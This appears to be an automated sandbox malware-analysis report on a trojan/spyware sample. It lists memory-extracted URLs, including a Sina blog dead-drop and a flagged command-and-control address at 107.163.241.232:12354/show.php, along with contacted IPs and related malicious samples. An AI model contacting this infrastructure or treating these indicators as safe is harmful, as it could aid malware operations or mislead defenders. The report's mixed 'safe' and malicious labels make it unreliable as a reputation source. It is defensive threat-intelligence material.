http://blog.sina.com.cn/u/5655029807?	rundll32.exe, 0000000B.00000003.2266852076.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2294693416.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3415368904.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3193530668.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2938955196.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3671902920.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706492853.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898885834.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2598064814.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898521326.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2765318148.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2615055327.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2659240427.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3732023497.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3152461244.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1931202109.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2044371351.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2393534599.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3749057023.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185790831.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807=q	rundll32.exe, 0000000B.00000002.3742655429.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.sina.com.cn/a	rundll32.exe, 0000000B.00000003.2804453169.0000000005E99000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.sina.com.cn/krnaver.com	rundll32.exe, 0000000B.00000003.2023193696.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1899075201.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930989630.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1954698129.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2120279676.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2162385617.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1972886857.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3647858321.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.sina.com.cn/u/5655029807S.	rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807zI	rundll32.exe, 0000000B.00000003.2484714513.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898743445.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3192331090.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807zD	rundll32.exe, 0000000B.00000003.2279237439.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1873442088.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1899075201.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831828387.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3031835504.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2270808056.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1879231380.00000000030EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://107.163.241.232:12354/show.phpU6	rundll32.exe, 0000000B.00000003.3614190746.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3586874031.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2479584345.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2737248179.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2461344495.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3688624944.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3671902920.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2706492853.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3732023497.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3749057023.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.241.232:12354/show.phpbat	rundll32.exe, 0000000B.00000003.1873391879.0000000005E57000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://107.163.241.232:12354/show.phpw	rundll32.exe, 0000000B.00000003.1564311068.0000000005E78000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5655029807z?	rundll32.exe, 0000000B.00000003.1709101946.0000000005E77000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.sina.com.cn/Ap	rundll32.exe, 0000000B.00000003.2302048712.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807zq6~	rundll32.exe, 0000000B.00000003.3614190746.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3688624944.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3671902920.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3732023497.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3749057023.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	false		high
http://107.163.241.232:12354/show.phpm6b	rundll32.exe, 0000000B.00000003.1630964432.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1873391879.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1955205499.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524675338.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2994795569.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898568635.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1874878565.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3298966343.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996535082.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831626210.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3171831439.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790546741.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023510494.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2898885834.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2765318148.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1749224254.0000000005E60000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1658959024.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709224291.0000000005E58000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1524304026.0000000005E57000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230897223.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5655029807z;	rundll32.exe, 0000000B.00000003.2938513418.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2407360360.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2279237439.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2291900665.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2417680832.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2380844818.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302048712.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2633708483.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2678805172.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2300015872.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3568732499.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2412160866.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3671568185.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.sina.com.cn/u/56550298071Sh88F86E74-75B2-4AFD-B463-A2998EB0EEF6	rundll32.exe, 0000000B.00000003.2958626885.0000000005EE1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807Y6	rundll32.exe, 0000000B.00000003.2352322390.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2994795569.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266852076.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2294693416.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2938955196.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2615055327.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2417807195.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2393534599.0000000005E53000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185790831.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807z8	rundll32.exe, 0000000B.00000003.2938513418.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3031835504.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2241271335.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2836709199.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2235329739.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2162385617.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2243458067.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3351830040.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3671568185.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2556684159.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3108722812.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.sina.com.cn/=3o	rundll32.exe, 0000000B.00000003.3712679886.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3310227243.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3517778921.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1899075201.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1930989630.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2444614613.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2484714513.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2229640488.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2266699679.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2938513418.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2023193696.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230750709.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2185332580.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2407360360.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2279237439.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2231428453.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996678440.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790388775.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2629218588.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3742655429.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1705006131.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.sina.com.cn/d8r	rundll32.exe, 0000000B.00000003.3732023497.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807z3	rundll32.exe, 0000000B.00000003.3310227243.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3517778921.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2162385617.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3351830040.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/%s	rundll32.exe, rundll32.exe, 0000000B.00000002.3751565251.0000000010016000.00000040.00000001.01000000.00000006.sdmp	false		high
http://blog.sina.com.cn/u/5655029807z5	rundll32.exe, 0000000B.00000003.3152461244.0000000005E52000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807z6	rundll32.exe, 0000000B.00000003.2279237439.00000000030E4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.sina.com.cn/rn	rundll32.exe, 0000000B.00000003.2804453169.0000000005E99000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.sina.com.cn/jo6	rundll32.exe, 0000000B.00000003.2804453169.0000000005E99000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807z.	rundll32.exe, 0000000B.00000003.2023193696.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1996678440.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1899075201.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3399364881.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2633708483.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1879231380.00000000030EE000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807zh	rundll32.exe, 0000000B.00000003.3517778921.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2629218588.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1631107673.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2633708483.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://107.163.241.232:12354/show.phpurce	rundll32.exe, 0000000B.00000003.3399364881.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://blog.sina.com.cn/u/5655029807lication	rundll32.exe, 0000000B.00000003.2737248179.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	false		high
http://107.163.241.232:12354/show.phpc	rundll32.exe, 0000000B.00000003.3712679886.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1872794400.0000000005E75000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2938513418.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2279237439.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2629218588.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1628908153.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2543105125.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2291900665.00000000030E4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1709101946.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1831828387.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2311063444.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2361678413.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3031835504.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1631107673.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790546741.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2380844818.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1705006131.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302048712.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3399364881.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2633708483.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2300015872.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://blog.sina.com.cn/u/5655029807y	rundll32.exe, 0000000B.00000003.2294693416.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302222734.0000000005E53000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807zc	rundll32.exe, 0000000B.00000003.1955205499.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3230750709.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3151099482.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2812133556.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1898521326.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1790388775.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1931202109.0000000005E78000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2764838421.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://blog.sina.com.cn/u/5655029807.	rundll32.exe, 0000000B.00000003.1873442088.00000000030EE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2302048712.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.2305140592.00000000030CC000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3647858321.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high
http://blog.sina.com.cn/u/5655029807z	rundll32.exe, 0000000B.00000002.3748945522.0000000005E40000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.1658896770.0000000005E77000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3499230558.0000000005E52000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000003.3647858321.00000000030CC000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
202.108.0.52	blogx.sina.com.cn	China		4808	CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	false
107.163.241.232	unknown	United States		20248	TAKE2US	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1573198
Start date and time:	2024-12-11 16:25:55 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 27s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	peks66Iy06.exe renamed because original name is a hash value
Original Sample Name:	063ae487b767c03bb51d34f55e4ce21a0f8f11affff4e094939584f82e8ac727.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@22/3@54/3
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 100% Number of executed functions: 61 Number of non-executed functions: 93
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target rundll32.exe, PID 7880 because there are no executed function
HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: peks66Iy06.exe

Simulations

Behavior and APIs

Time	Type	Description
10:26:58	API Interceptor	580558x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
202.108.0.52	nt11qTrX4f.exe	Get hash	malicious	Unknown	Browse	blog.sina.com.cn/u/5655029807
	otsIBG7J9b.exe	Get hash	malicious	Unknown	Browse	blog.sina.com.cn/u/5655029807
	XgijTrY6No.exe	Get hash	malicious	Unknown	Browse	blog.sina.com.cn/u/5655029807
	VqCbf9fhnQ.exe	Get hash	malicious	Unknown	Browse	blog.sina.com.cn/u/5655029807
	k4F4uRTZZR.dll	Get hash	malicious	Unknown	Browse	blog.sina.com.cn/u/5655029807
	5jme4p7u76.exe	Get hash	malicious	Unknown	Browse	blog.sina.com.cn/u/5655029807
107.163.241.232	nt11qTrX4f.exe	Get hash	malicious	Unknown	Browse	107.163.241.232:12354/show.php
107.163.241.232	otsIBG7J9b.exe	Get hash	malicious	Unknown	Browse	107.163.241.232:12354/show.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
blogx.sina.com.cn	nt11qTrX4f.exe	Get hash	malicious	Unknown	Browse	202.108.0.52
	otsIBG7J9b.exe	Get hash	malicious	Unknown	Browse	202.108.0.52
	XgijTrY6No.exe	Get hash	malicious	Unknown	Browse	202.108.0.52
	08e2VwqyI0.dll	Get hash	malicious	Unknown	Browse	202.108.0.52
	PqZ6GU98Eh.dll	Get hash	malicious	Unknown	Browse	202.108.0.52
	jYAKmjIPgI.dll	Get hash	malicious	Unknown	Browse	202.108.0.52
	b3sV534MMf.dll	Get hash	malicious	Unknown	Browse	202.108.0.52
	NaRZIOq3O8.dll	Get hash	malicious	Unknown	Browse	202.108.0.52
	33twe7X26S.dll	Get hash	malicious	Unknown	Browse	202.108.0.52
	MYuRWuVXzX.dll	Get hash	malicious	Unknown	Browse	202.108.0.52

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CHINA169-BJChinaUnicomBeijingProvinceNetworkCN	nt11qTrX4f.exe	Get hash	malicious	Unknown	Browse	202.108.0.52
	otsIBG7J9b.exe	Get hash	malicious	Unknown	Browse	202.108.0.52
	XgijTrY6No.exe	Get hash	malicious	Unknown	Browse	202.108.0.52
	Josho.ppc.elf	Get hash	malicious	Unknown	Browse	123.121.0.198
	Josho.mpsl.elf	Get hash	malicious	Unknown	Browse	124.192.197.161
	Josho.mips.elf	Get hash	malicious	Unknown	Browse	114.67.239.168
	hax.x86.elf	Get hash	malicious	Mirai	Browse	221.222.118.76
	hax.ppc.elf	Get hash	malicious	Mirai	Browse	140.210.138.192
	.5r3fqt67ew531has4231.x86.elf	Get hash	malicious	Mirai, Moobot, Okiru	Browse	103.135.163.78
	rebirth.arm.elf	Get hash	malicious	Mirai, Okiru	Browse	122.113.109.82
TAKE2US	nt11qTrX4f.exe	Get hash	malicious	Unknown	Browse	107.163.241.232
	otsIBG7J9b.exe	Get hash	malicious	Unknown	Browse	107.163.241.232
	XgijTrY6No.exe	Get hash	malicious	Unknown	Browse	107.163.241.204
	08e2VwqyI0.dll	Get hash	malicious	Unknown	Browse	107.163.56.110
	PqZ6GU98Eh.dll	Get hash	malicious	Unknown	Browse	107.163.56.110
	jYAKmjIPgI.dll	Get hash	malicious	Unknown	Browse	107.163.56.110
	b3sV534MMf.dll	Get hash	malicious	Unknown	Browse	107.163.56.110
	NaRZIOq3O8.dll	Get hash	malicious	Unknown	Browse	107.163.241.193
	33twe7X26S.dll	Get hash	malicious	Unknown	Browse	107.163.241.193
	MYuRWuVXzX.dll	Get hash	malicious	Unknown	Browse	107.163.56.110

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	202.108.0.52
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	202.108.0.52
	DEC 2024 RFQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	202.108.0.52
	Itaxyhi.exe	Get hash	malicious	Phemedrone Stealer	Browse	202.108.0.52
	file.exe	Get hash	malicious	Snake Keylogger	Browse	202.108.0.52
	Confirm revised invoice to proceed with payment ASAP.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	202.108.0.52
	REQUEST FOR QUOATION AND PRICES 0108603076-24_pdf.exe	Get hash	malicious	GuLoader	Browse	202.108.0.52
	Bank Swift and SOA PRN0072700314159453_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	202.108.0.52
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	202.108.0.52
